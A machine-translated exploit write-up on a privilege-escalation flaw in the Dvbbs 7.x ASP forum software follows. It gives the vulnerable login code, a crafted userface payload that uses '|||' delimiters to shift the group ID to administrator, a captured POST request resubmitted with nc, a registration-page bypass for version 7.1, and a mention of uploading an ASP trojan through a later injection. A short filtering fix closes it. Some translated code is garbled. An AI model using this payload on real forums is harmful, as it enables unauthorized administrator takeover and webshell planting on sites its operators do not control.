Research on the theory of 7.x privilege elevation vulnerability in dynamic network

In June on the black defense to see "dynamic network 7.1 loopholes found in the world," a paper, said admin_postings.asp file exists injection loopholes, but the prerequisite is to have a super moderator or front desk administrator rights. I think of the previous discovery of the 7.x version of the network has a foreground privilege elevation loophole, just can be combined to use. This foreground privilege elevation vulnerability is valid for both access and SQL versions of 7.x. Let's use the 7.0 SP2 SQL version to explain the exploit.
Vulnerability Analysis:
We know that the dynamic network is through the GroupID to determine the current user's group, and then through the group's information to judge the user's permissions. How did it get this groupid? Let's take a look at the Login verification section: Login.asp's 525 lines:
Rem ========== Forum Login function =========
Rem Judge User Login
Function Chkuserlogin (Username,password,mobile,usercookies,ctype)
............ The preceding code omits
Sql= "Select Userid,username,userpassword,useremail,userpost,usertopic,usersex,userface
, Userwidth,userheight,joindate,lastlogin,userlogins,lockuser,userclass,usergroupid,usergroup,
Userwealth,userep,usercp,userpower,userbirthday,userlastip,userdel,userisbest,userhidden,
Usermsg,ischallenge,usermobile,titlepic,usertitle,truepassword,usertoday "
Sql=sql+ "from [Dv_user] Where" &SQLstr& ""
Set Rsuser=dvbbs. Execute (SQL)
If rsuser.eof and Rsuser.bof Then
Chkuserlogin=false
Exit Function
Else
Imyuserinfo=rsuser.getstring (, 1, "| | |", "", "")
RsUser.Close:Set Rsuser = Nothing
End If
Imyuserinfo = "dvbbs| | |" & Now & "| | |" & Now & "| | |" & Dvbbs. Boardid & "| | |" &
Imyuserinfo & | | | Dvbbs "
Imyuserinfo = Split (imyuserinfo, "| | |")
If Trim (password) <>trim (Imyuserinfo (6)) Then
Chkuserlogin=false
ElseIf imyuserinfo (=1) Then
Chkuserlogin=false
ElseIf imyuserinfo (=5) Then
Chkuserlogin=false
Else
Chkuserlogin=true
Session (Dvbbs. CacheName & "UserID") = Imyuserinfo
Dvbbs. UserID = Imyuserinfo (4)
Regname = Imyuserinfo (5)
Article = Imyuserinfo (8)
Userlastlogin = Imyuserinfo (15)
UserClass = Imyuserinfo (18)
GroupID = Imyuserinfo (19)
Titlepic = Imyuserinfo (34)
If article<0 Then article=0
End If
............ The following code omits
You can see that the dynamic network will be the user's information first with "| | |" Three vertical bars are connected, as a string passed to Imyuserinfo, and then imyuserinfo by "| | |" Separated into an array of strings. When the user password is validated correctly, the value of the 20th element of the array: Imyuserinfo (19) is assigned to the GroupID. See, GroupID is just the value of the 20th element of the array, and if the value of Imyuserinfo (19) is 1, the net will assume that the user who is now logged in is the front desk administrator.
In the dv_clsmain.asp file in the INC directory there is also a section of code that authenticates the user to detect the user's permissions after the user updates the information.
About 650 lines of dv_clsmain.asp.
Public Sub Truecheckuserlogin ()
...... The preceding omission
Dim Rs,sql
Sql= "Select Userid,username,userpassword,useremail,userpost,usertopic,usersex,
Userface,userwidth,userheight,joindate,lastlogin,userlogins,lockuser,userclass,usergroupid,
Usergroup,userwealth,userep,usercp,userpower,userbirthday,userlastip,userdel,userisbest,
Userhidden,usermsg,ischallenge,usermobile,titlepic,usertitle,truepassword,usertoday "
Sql=sql+ "from [Dv_user] Where UserID =" & UserID
Set Rs = Execute (SQL)
If rs.eof and Rs.bof Then
Rs.Close:Set Rs = Nothing
UserID = 0
Emptycookies
Letguestsession ()
Else
Myuserinfo=rs.getstring (, 1, "| | |", "", "")
Rs.Close:Set Rs = Nothing
If IsArray (Session (CacheName & "UserID") Then
Myuserinfo = "dvbbs| | |" & Now & "| | |" & Session (CacheName & "UserID") (2) & "| | |" & Boardid & "| | |" & Myuserinfo & "| | | Dvbbs "
Else
Myuserinfo = "dvbbs| | |" & Now & "| | |" & DATEADD ("S", -3600,now ()) & "| | |" & Boardid & "| | |" & Myuserinfo & "| | | Dvbbs "
End IF
Response.Write Myuserinfo
Myuserinfo = Split (myuserinfo, "| | |")
......
End If
End Sub
After a successful user login, this function is used to read the user array and to judge some common information
Public Sub Getcacheuserinfo ()
Myuserinfo = Session (CacheName & "UserID")
UserID = CLNG (Myuserinfo (4))
MemberName = Myuserinfo (5)
Lastlogin = Myuserinfo (15)
If not IsDate (lastlogin) Then lastlogin = Now ()
Usergroupid = Cint (Myuserinfo (19))
...... Back code omitted
The two tests are in exactly the same way, so we can use either of these two to achieve our goal. Look at the part of its SQL statement:
Sql= "Select Userid,username,userpassword,useremail,userpost,usertopic,usersex,userface,userwidth,userheight, Joindate,lastlogin,userlogins,lockuser,userclass,usergroupid,usergroup,userwealth,userep,usercp,userpower, Userbirthday,userlastip,userdel,userisbest,userhidden,usermsg,ischallenge,usermobile,titlepic,usertitle, Truepassword,usertoday "
Sql=sql+ "from [Dv_user] Where UserID =" & UserID

The Usergroupid field is ranked 16th, so as long as the data in the previous field contains "| | |", the USERGROUPID is changed in myuserinfo the position of the string array. Select some special requirements for this field, the field type to be appropriate, cannot be numeric, the length of the field to be able to accommodate the array we constructed, and also the above SQL statements in the Usergroupid before the field, This allows the constructed array to change the position of the usergroupid in the original array. As shown in Figure 1.
We can use only UserEmail, Userface these two fields. Because of the existence of the IsValidEmail function, we can't insert ' | ' In the UserEmail field, so we can only use the Userface field.
In the basic data modification, the dynamic network only filtered the SQL injection of a few symbols, did not filter out ' | ', so as long as we construct the correct string, you can cheat over the network, become the user of the Administrators group.
Face=dv_filterjs (replace (Face, "", ""))
Face=replace (Face, "..", "")
Face=replace (Face, "\", "/")
Face=replace (Face, "^", "")
Face=replace (Face, "#", "")
Face=replace (Face, "%", "")
Exploit the vulnerability:
How to construct this userface to achieve our goal? In the beginning I thought that as long as Imyuserinfo (19) is 1 can be the administrator, but has not been successful. In fact, when we construct this userface, we have to take into account that we have changed the structure of the imyuserinfo array, we have to make sure that the structure of the previous part of the new Imyuserinfo array is exactly the same as the original array structure, otherwise there will be a type conversion error. For example Userbirthday, the value of the field position in the new array must be a date. We can make our Userface value directly from the second half of a normal imyuserinfo, and then change the usergroupid position to one. I modified the login.asp file so that it displays the contents of the current user's imyuserinfo when the user logs on, as shown in Figure 2.
For example admin (not necessarily admin, other user's line, as long as the usergroupid to 1 on the line) the value of Imyuserinfo at logon is:
dvbbs| | | 2005-6-1918:05:34| | | 2005-6-19 18:05:34| | | 0| | | 1| | | admin| | | 469e80d32c0559f8| | |
eway@aspsky.net| | |4| | |1| | |0| | |images/userface/image1.gif| | |32| | |32| | |2003-12-30 16:34:00| | | 2005-6-1918:04:06| | | 25| | | 0| | | admin | | | 1| | | | | 120| | | 115| | | 28| | | 0| | | | | 210.41.235.200
||| 0| | | 0| | | 0| | | | | 0| | | | | level10.gif| | | | | 9pc722664t5w7im7| | | 0|0|0 | | | Dvbbs
We can take
images/userface/image1.gif| | | 32| | | 32| | | 2003-12-30 16:34:00| | | 2005-6-19 18:04:06| | | 25| | | 0| | | admin | | | 1| | | | | 120| | | 115| | | 28| | | 0| | | | | 210.41.235.200| | | 0| | | 0| | | 0| | | | | 0| | | | | level10.gif| | | | | 9pc722664t5w7im7| | | 0|0|0 | | | Dvbbs

To do our Userface value, be aware that this value cannot exceed 255 characters in length. The network limits the characters we submit to 100, we can use NC to submit.
First Test in this machine, with ordinary users log on the network, now the user level or novice on the road.
OK, let's go to the place where the basic information is modified.
Submit, grab this bag with WSE.
The packets that are intercepted are as follows:
Post/bs/mymodify.asp?action=updat&username=4 http/1.1
Accept:image/gif, Image/x-xbitmap, Image/jpeg, Image/pjpeg, Application/x-shockwave-flash, application/vnd.ms-excel , Application/vnd.ms-powerpoint, Application/msword, */*
Referer:http://210.41.235.199/bs/mymodify.asp ACCEPT-LANGUAGE:ZH-CN
content-type:application/x-www-form-urlencoded Accept-encoding:gzip, deflate
user-agent:mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Alexa Toolbar; Mxie. NET CLR 1.1.4322)
host:210.41.235.199 content-length:396 connection:keep-alive Cache-control:no-cache cookie:210%2e41%2e235%2e199% 2fbs%2f=usercookies=0&statuserid=21048347059&password=fviy4l887zvd956c&userhidden=&username= test&userclass=%d0%c2%ca%d6%c9%cf%c2%b7&userid=4; upnum=0; Aspsessionidascdabta=ieghdlkcchdmobpfpffhmnam
Title=&sex=1&face=images%2fuserface%2fimage1.gif&myface=images%2fuserface%2fimage1.gif&width= 32&height=32&birthday=&userphoto=&groupname=%ce%de%c3%c5%ce%de%c5%c9&signature=&showre =0&usercookies=0&setuserinfo=1&setusertrue=0&realname=&personal=&country=& userphone=&address=&province=&selectp=0&city=&selectc=0&shengxiao=&blood=& Belief=&occupation=&marital=&education=&college=&submit=%b8%fc+%d0%c2
Well, we'll replace the value of Userface
images/userface/image1.gif| | | 32| | | 32| | | 2003-12-30%2016:34:00| | | 2005-6-19%2018:04:06| | | 25| | | 0| | | admin | | | 1| | | | | 120| | | 115| | | 28| | | 0| | | | | 210.41.235.200| | | 0| | | 0| | | 0| | | | | 0| | | | | level10.gif| | | | |
9pc722664t5w7im7| | | 0|0|0 | | | Dvbbs
Notice that the middle space is replaced with%20, recalculate the Content-length value, and then submit it once with NC, and the userface of our user is replaced. Let's log in again now.
Haha, did you see it? We are already an administrator. The second use of the Black Defense Sixth "dynamic network 7.1 loopholes discovered" a loophole in the article can be added to the background administrator.
Dynamic Network 7.1 Utilization method:
7.1 Version of the dynamic network to exploit this loophole a little change, more difficult than 7.0 SP2. The ' | ' in the face variable was added in version 7.1 The filter of the symbol
mymodify.asp file in the vicinity of 270 lines:
Face=dv_filterjs (Replace (Face, "", ""))
Face=replace (Face, "..", "")
Face=replace (Face, "\", "/")
Face=replace (Face, "^", "")
Face=replace (Face, "#", "")
Face=replace (Face, "%", "")
Face=replace (Face, "|", "")
Unfortunately, the dynamic network programmer hundred and a sparse, forget to register can also modify the avatar, in the reg.asp has no face variable to do any filtering. Reg.asp 285 lines near the file.
If Request.Form ("Face") <> "Then"
Face=request.form ("Face")
End If
Similarly, first grab the package and then submit it with NC. Registration is the front desk administrator after the login. But one more question, is the truepassword problem. 7.1 has enhanced the prevention of cookie spoofing, so this truepassword has changed too frequently. In 7.0sp2 's newpass.asp, there is only one directive that updates the current user turepassword:
7.0 SP2 's newpass.asp file
Error processing SSI file

Error processing SSI file

<%
Dvbbs. NewPassword0 ()
%>
In 7.1, newpass.asp also checks whether the user's cookies are updated. About 30 lines of 7.1newpass.asp file
Check Write success Update data if successful
If dvbbs.checkstr (Trim (Request.Cookies) (Dvbbs. FORUM_SN) ("password")) =truepassword Then
Dvbbs. Execute ("UpDate [Dv_user] Set truepassword=" &TruePassWord& "where userid=" &dvbbs. UserID)
Dvbbs. Memberword = Truepassword
Dim Iuserinfo
Iuserinfo = Session (Dvbbs. CacheName & "UserID")
Iuserinfo (km) = Truepassword
Session (Dvbbs. CacheName & "UserID") = Iuserinfo
End If
In 7.1, the Truepassword of our client's cookies is updated to the new Truepassword, because the server-side Truepassword is also derived from the Myuserinfo, and myuserinfo values in the same truepassword will not change , a dead loop is formed at the time of Detection. Our solution is to use cookies to lock, with the Guilin Veteran's browser to lock our cookies, before we have to set the cookies in the Truepassword value and Myuserinfo in the Truepassword value of the same. This will not repeat the request newpass.asp into the dead loop.
Because there is no 7.1 of the SQL version of the code, so the above is tested in the 7.1 access version, you can successfully become the administrator of the front desk.
Postscript:
The prevention method of the loophole: the project of changing the database structure is big, suggest to add to the corresponding variable "|" in Reg.asp and mymodify.asp Symbols for filtering, such as:
Face=dv_filterjs (Replace (Face, "", ""))
Face=replace (Face, "..", "")
Face=replace (Face, "\", "/")
Face=replace (Face, "^", "")
Face=replace (Face, "#", "")
Face=replace (Face, "%", "")
Face=replace (Face, "|", "")
Also want to mention, move the network too trust backstage administrator, so in many places in the background do not have SQL injection to prevent, this is like to open a SQL injection door. We have ever detected a website that is set up very BT. The above is the Dvbbs forum. When we have obtained the DVBBS admin permission only then discovers the upload directory does not have the execution authority, the ASP Trojan Horse passes up and returns as it is. The directory that executes the ASP permissions does not have write permissions. There are no other sites on the site that can be injected. Later found Dvbbs backstage has injected after finally got a pony. It's sink, Shan.
A shiver, this privilege elevation flaw is not too advanced skill, but the consequence is very serious. Because of the presence of SQL injection on multiple pages managed by the foreground, this vulnerability is very damaging to the Dvbbs 7.x SQL version. Please do not use this method to do destructive behavior, otherwise the consequences of conceit.